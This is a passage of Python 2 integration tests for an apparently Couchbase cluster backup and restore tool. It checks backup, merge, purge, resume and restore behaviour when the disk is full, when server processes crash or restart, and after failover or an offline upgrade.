expected_results = {
"real_userid:source": "memcached",
"real_userid:user": "default",
"name": "authentication succeeded",
"id": AUDITRESTOREID,
"description": "Authentication to the cluster succeeded",
"timestamp": "{0}".format(self.backups[0]),
"bucket": "{0}".format(self.buckets[0].name),
"sockname": "%s:%s" % (self.backupset.restore_cluster_host.ip,
constants.memcached_port),
"peername": "{0}".format(self.backupset.backup_host.ip)
}
return expected_results
def test_backup_restore_with_lesser_nodes(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Adds another node to restore cluster and rebalances - note the test has to be run with nodes_init >= 3 so
that cluster host had more nodes than restore host
3. Creates backupset on backup host
4. Creates backup of cluster host with 3 or more number of nodes and validates
5. Restores to restore host with lesser number of nodes (2) and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.add_node(self.input.clusters[0][1].rest_username, self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip)
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate()
def test_backup_with_full_disk(self):
"""
Things to be done before running this testcase:
- scripts/install.py has to be run with init_nodes=False
- scripts/cbqe3043.py has to be run against the ini file - this script will mount a 20MB partition on the
nodes required for the test
1. Creates specified bucket on the cluster and loads it with given number of items
2. Sets backup directory to the 20MB partition and creates a backupset
3. Fills up 20MB partition
4. Keeps taking backup until no space left on device error is hit
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backupset.directory = "/cbqe3043/entbackup"
self.backup_create()
conn = RemoteMachineShellConnection(self.backupset.backup_host)
output, error = conn.execute_command("dd if=/dev/zero of=/cbqe3043/file bs=18M count=1")
conn.log_command_output(output, error)
output, error = self.backup_cluster()
while self._check_output("Backup successfully completed", output):
output, error = self.backup_cluster()
error_msg = "Error backing up cluster: Unable to read data because range.json is corrupt,"
self.assertTrue(self._check_output(error_msg, output),
"Expected error message not thrown by backup when disk is full")
self.log.info("Expected error thrown by backup command")
conn.execute_command("rm -rf /cbqe3043/file")
conn.disconnect()
def test_backup_and_restore_with_map_buckets(self):
"""
1. Creates specified buckets on the cluster and loads it with given number
of items - memcached bucket has to be created for this test
(memcached_buckets=1)
2. Creates a backupset, takes backup of the cluster host and validates
3. Executes list command on the backup and validates that memcached bucket
has been skipped
4. Restores the backup and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
if self.create_gsi:
self.create_indexes()
self.backup_create()
self.backup_cluster()
status, output, message = self.backup_list()
if not status:
self.fail("Getting backup list to validate memcached buckets failed.")
for line in output:
self.assertTrue("memcached_bucket0" not in line,
"Memcached bucket found in backup list output after backup")
self.log.info("Memcached bucket not found in backup list output after backup as expected")
self.backup_restore()
if self.create_gsi:
self.verify_gsi()
def test_backup_with_erlang_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number
of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills and restarts
erlang process
4. Validates backup output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory, name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang()
conn.start_couchbase()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output("Backup successfully completed", output),
"Backup failed with erlang crash and restart within 180 seconds")
self.log.info("Backup succeeded with erlang crash and restart within 180 seconds")
conn.disconnect()
def test_backup_with_couchbase_stop_and_start(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills and restarts couchbase server
4. Validates backup output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory, name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.stop_couchbase()
conn.start_couchbase()
conn.disconnect()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output("Backup successfully completed", output),
"Backup failed with couchbase stop and start within 180 seconds")
self.log.info("Backup succeeded with couchbase stop and start within 180 seconds")
def test_backup_with_memcached_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills and restarts memcached process
4. Validates backup output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.pause_memcached()
conn.unpause_memcached()
conn.disconnect()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output("Backup successfully completed", output),
"Backup failed with memcached crash and restart within 180 seconds")
self.log.info("Backup succeeded with memcached crash and restart within 180 seconds")
def test_backup_with_erlang_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills erlang process
4. Waits for 200s and Validates backup error
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
try:
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
if self.os_name != "windows":
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang(self.os_name)
output = backup_result.result(timeout=200)
if self.debug_logs:
print "Raw output from backup run: ", output
error_mesgs = ["Error backing up cluster: Not all data was backed up due to",
"No connection could be made because the target machine actively refused it."]
error_found = False
for error in error_mesgs:
if self._check_output(error, output):
error_found = True
if not error_found:
raise("Expected error message not thrown by Backup 180 seconds after erlang crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
def test_backup_with_couchbase_stop(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills couchbase server
4. Waits for 200s and Validates backup error
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
try:
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.stop_couchbase()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error backing up cluster: Not all data was backed up due to connectivity issues.", output),
"Expected error message not thrown by Backup 180 seconds after couchbase-server stop")
self.log.info("Expected error message thrown by Backup 180 seconds after couchbase-server stop")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
def test_backup_with_memcached_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills memcached process
4. Waits for 200s and Validates backup error
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
try:
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.pause_memcached(self.os_name)
self.sleep(17, "time needs for memcached process completely stopped")
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
output = backup_result.result(timeout=200)
mesg = "Error backing up cluster: Unable to find the latest vbucket sequence numbers."
self.assertTrue(self._check_output(mesg, output),
"Expected error message not thrown by Backup 180 seconds after memcached crash")
self.log.info("Expected error thrown by Backup 180 seconds after memcached crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.unpause_memcached(self.os_name)
self.sleep(30)
conn.disconnect()
def test_restore_with_erlang_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host and backsup data
3. Initiates a restore - while restore is going on kills and restarts erlang process
4. Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.kill_erlang(self.os_name)
conn.start_couchbase()
conn.disconnect()
timeout_now = 400
if self.os_name == "windows":
timeout_now = 600
output = restore_result.result(timeout=timeout_now)
self.assertTrue(self._check_output("Restore completed successfully", output),
"Restore failed with erlang crash and restart within 180 seconds")
self.log.info("Restore succeeded with erlang crash and restart within 180 seconds")
def test_restore_with_couchbase_stop_and_start(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host and backsup data
3. Initiates a restore - while restore is going on kills and restarts couchbase process
4. Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.stop_couchbase()
self.sleep(10)
conn.start_couchbase()
conn.disconnect()
output = restore_result.result(timeout=500)
self.assertTrue(self._check_output("Restore completed successfully", output),
"Restore failed with couchbase stop and start within 180 seconds")
self.log.info("Restore succeeded with couchbase stop and start within 180 seconds")
def test_restore_with_memcached_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host and backsup data
3. Initiates a restore - while restore is going on kills and restarts memcached process
4. Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
restore_result = self.cluster.async_restore_cluster(restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end, directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.pause_memcached(self.os_name)
conn.unpause_memcached(self.os_name)
conn.disconnect()
output = restore_result.result(timeout=600)
self.assertTrue(self._check_output("Restore completed successfully", output),
"Restore failed with memcached crash and restart within 400 seconds")
self.log.info("Restore succeeded with memcached crash and restart within 400 seconds")
def test_restore_with_erlang_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host and backsup data
3. Initiates a restore - while restore is going on kills erlang process
4. Waits for 200s and Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
try:
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.kill_erlang(self.os_name)
output = restore_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error restoring cluster: Not all data was sent to Couchbase", output),
"Expected error message not thrown by Restore 180 seconds after erlang crash")
self.log.info("Expected error thrown by Restore 180 seconds after erlang crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
def test_restore_with_couchbase_stop(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host and backsup data
3. Initiates a restore - while restore is going on kills couchbase server
4. Waits for 200s and Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
try:
restore_result = self.cluster.async_restore_cluster(restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.stop_couchbase()
output = restore_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error restoring cluster: Not all data was sent to Couchbase due to connectivity issues.", output),
"Expected error message not thrown by Restore 180 seconds after couchbase-server stop")
self.log.info("Expected error message thrown by Restore 180 seconds after couchbase-server stop")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
def test_restore_with_memcached_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host and backsup data
3. Initiates a restore - while restore is going on kills memcached process
4. Waits for 200s and Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
try:
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.pause_memcached(self.os_name)
output = restore_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error restoring cluster: Not all data was sent to Couchbase", output),
"Expected error message not thrown by Restore 180 seconds after memcached crash")
self.log.info("Expected error thrown by Restore 180 seconds after memcached crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.unpause_memcached(self.os_name)
conn.disconnect()
self.sleep(30)
def test_backup_merge(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Takes specified number of backups (param number_of_backups - should be atleast 2 for this test case)
3. Executes list command and validates if all backups are present
4. Randomly selects a start and end and merges the backups
5. Executes list command again and validates if the new merges set of backups are listed
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
""" remove last 6 chars of offset time in backup name"""
if self.backups and self.backups[0][-3:] == "_00":
strip_backupset = [s[:-6] for s in self.backups]
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line).group()
if self.debug_logs:
print "backup name ", backup_name
print "backup set ", strip_backupset
if backup_name in strip_backupset:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(strip_backupset), "Initial number of backups did not match")
self.log.info("Initial number of backups matched")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = randrange(self.backupset.start + 1, self.backupset.number_of_backups + 1)
status, output, message = self.backup_merge()
if not status:
self.fail(message)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
""" remove last 6 chars of offset time in backup name"""
if self.backups and self.backups[0][-3:] == "_00":
strip_backupset = [s[:-6] for s in self.backups]
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line).group()
if self.debug_logs:
print "backup name ", backup_name
print "backup set ", strip_backupset
if backup_name in strip_backupset:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(strip_backupset), "Merged number of backups did not match")
self.log.info("Merged number of backups matched")
def test_backup_merge_with_restore(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Takes two backups - restores from the backups and validates
3. Merges both the backups - restores from merged backup and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=2)
self.backupset.start = 1
self.backupset.end = 2
output, error = self.backup_restore()
if error:
self.fail("Restoring backup failed: {0}".format(error))
self.log.info("Finished restoring backup before merging")
status, output, message = self.backup_merge()
if not status:
self.fail(message)
self.backupset.start = 1
self.backupset.end = 1
output, error = self.backup_restore()
if error:
self.fail("Restoring backup failed")
self.log.info("Finished restoring backup after merging")
def test_backup_merge_with_unmerged(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Takes two backups - merges them into one
3. Takes 2 more backups - merges the new backups with already merged ones and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=2)
self.backupset.start = 1
self.backupset.end = 2
self.log.info("Merging existing incremental backups")
status, output, message = self.backup_merge()
if not status:
self.fail(message)
self.log.info("Taking more backups")
self._take_n_backups(n=2)
self.backupset.start = 1
self.backupset.end = 3
self.log.info("Merging new backups into already merged backup")
status, output, message = self.backup_merge()
if not status:
self.fail(message)
self.log.info("Successfully merged new backups with already merged backup")
def test_merge_backup_with_multi_threads(self):
"""
1. Create a cluster with default bucket
2. Load default bucket with key1
3. Create backup with default one thread
4. Load again to bucket with key2
5. Create backup with 2 threads
6. Merge backup. All backup should contain doc key1 and key2
"""
gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start doing backup")
self.backup_create()
self.backup_cluster()
gen = BlobGenerator("ent-backup2", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_cluster(self.threads_count)
self.backupset.number_of_backups += 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
if int(self.backupset.number_of_backups) == 2:
self.backupset.end = 2
elif int(self.backupset.number_of_backups) > 2:
self.backupset.end = randrange(self.backupset.start,
self.backupset.number_of_backups + 1)
self.merged = True
status, output, _ = self.backup_merge()
self.backupset.end -= 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
current_vseqno = self.get_vbucket_seqnos(self.cluster_to_backup, self.buckets,
self.skip_consistency, self.per_node)
self.log.info("*** Start to validate data in merge backup ")
self.validate_backup_data(self.backupset.backup_host, [self.master],
"ent-backup", False, False, "memory",
self.num_items, None)
self.backup_cluster_validate(skip_backup=True)
def test_backup_purge(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Initiates a backup and kills the erlang server while backup is going on
4. Waits for the backup command to timeout
5. Executes backup command again with purge option
6. Validates the old backup is deleted and new backup is created successfully
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
old_backup_name = ""
new_backup_name = ""
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory, name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang()
output = backup_result.result(timeout=200)
self.log.info(str(output))
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
old_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name before purge: " + old_backup_name)
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
output, error = self.backup_cluster()
if error or not self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
new_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name after purge: " + new_backup_name)
self.assertNotEqual(old_backup_name, new_backup_name,
"Old backup name and new backup name are same when purge is used")
self.log.info("Old backup name and new backup name are not same when purge is used")
def test_backup_resume(self):
"""
1. Creates specified bucket on the cluster and loads it with given
number of items
2. Creates a backupset
3. Initiates a backup and kills the erlang server while backup is going on
4. Waits for the backup command to timeout
5. Executes backup command again with resume option
6. Validates the old backup is resumes and backup is completed successfully
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
old_backup_name = ""
new_backup_name = ""
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=False,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(3)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang(self.os_name)
output = backup_result.result(timeout=200)
self.log.info(str(output))
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
old_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}"
"_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name before resume: " + old_backup_name)
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
output, error = self.backup_cluster()
if error or not self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
new_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}"
"_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name after resume: " + new_backup_name)
self.assertEqual(old_backup_name, new_backup_name,
"Old backup name and new backup name are not same when resume is used")
self.log.info("Old backup name and new backup name are same when resume is used")
def test_backup_restore_with_deletes(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset - backsup data and validates
3. Perform deletes
4. Restore data and validate
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self._load_all_buckets(self.master, gen, "delete", 0)
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_failover(self):
"""
1. Test should be run with 2 nodes in cluster host (param: nodes_init = 2)
2. Creates specified bucket on the cluster and loads it with given number of items
3. Creates a backupset - backsup data and validates
4. Fails over the second node with specified type (param: graceful = True | False)
5. Sets recovery type to specified value (param: recoveryType = full | delta)
6. Adds back the failed over node and rebalances
7. Restores data and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
rest = RestConnection(self.backupset.cluster_host)
nodes_all = rest.node_statuses()
for node in nodes_all:
if node.ip == self.servers[1].ip:
rest.fail_over(otpNode=node.id, graceful=self.graceful)
self.sleep(30)
rest.set_recovery_type(otpNode=node.id, recoveryType=self.recoveryType)
rest.add_back_node(otpNode=node.id)
rebalance = self.cluster.async_rebalance(self.servers, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_after_offline_upgrade(self):
"""
1. Test has to be supplied initial_version to be installed, create
default bucket and load data to this bucket.
2. Backup cluster and verify data and delete default bucket
3. Upgrades cluster to upgrade_version re-reates default bucket
4. Restores data and validates
"""
upgrade_version = self.input.param("upgrade_version", "5.0.0-3330")
if upgrade_version == "5.0.0-3330":
self.fail("\n *** Need param 'upgrade_version=' to run")
self._install(self.servers)
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
rebalance = self.cluster.async_rebalance(self.servers[:2], [self.servers[1]],
[])
rebalance.result()
RestConnection(self.master).create_bucket(bucket='default', ramQuotaMB=512)
self.buckets = RestConnection(self.master).get_buckets()
self.total_buckets = len(self.buckets)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.sleep(5)
BucketOperationHelper.delete_bucket_or_assert(self.master, "default", self)
""" Start to upgrade """
if self.force_version_upgrade:
upgrade_version = self.force_version_upgrade
upgrade_threads = self._async_update(upgrade_version=upgrade_version,
servers=self.servers[:2])
for th in upgrade_threads:
th.join()
self.log.info("Upgraded to: {ver}".format(ver=upgrade_version))
self.sleep(30)
""" Re-create default bucket on upgrade cluster """
RestConnection(self.master).create_bucket(bucket='default', ramQuotaMB=512)
self.sleep(5)
""" Only server from Spock needs build in user
to access bucket and other tasks
"""
print "************** cb version: ", RestConnection(self.master).get_nodes_version()[:1]
if "5" <= RestConnection(self.master).get_nodes_version()[:1]:
self.add_built_in_server_user()
for user in self.users_check_restore:
user_name = user.replace('[', '_').replace(']', '_')
testuser = [{'id': user_name, 'name': user_name,
'password': 'password'}]
rolelist = [{'id': user_name, 'name': user_name,
'roles': user}]
self.log.info("**** add built-in '%s' user to node %s ****" % (testuser[0]["name"],
self.master.ip))
RbacBase().create_user_source(testuser, 'builtin', self.master)
self.log.info("**** add '%s' role to '%s' user ****" % (rolelist[0]["roles"],
testuser[0]["name"]))
RbacBase().add_user_role(rolelist, RestConnection(self.master), 'builtin')
backupsets = [self.backupset]
if "5" <= RestConnection(self.master).get_nodes_version()[:1]:
for user in self.users_check_restore:
new_backupset = copy.deepcopy(self.backupset)
new_backupset.restore_cluster_host_username = user.replace('[', '_').replace(']', '_')
backupsets.append(new_backupset)
for backupset in backupsets:
self.backupset = backupset
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
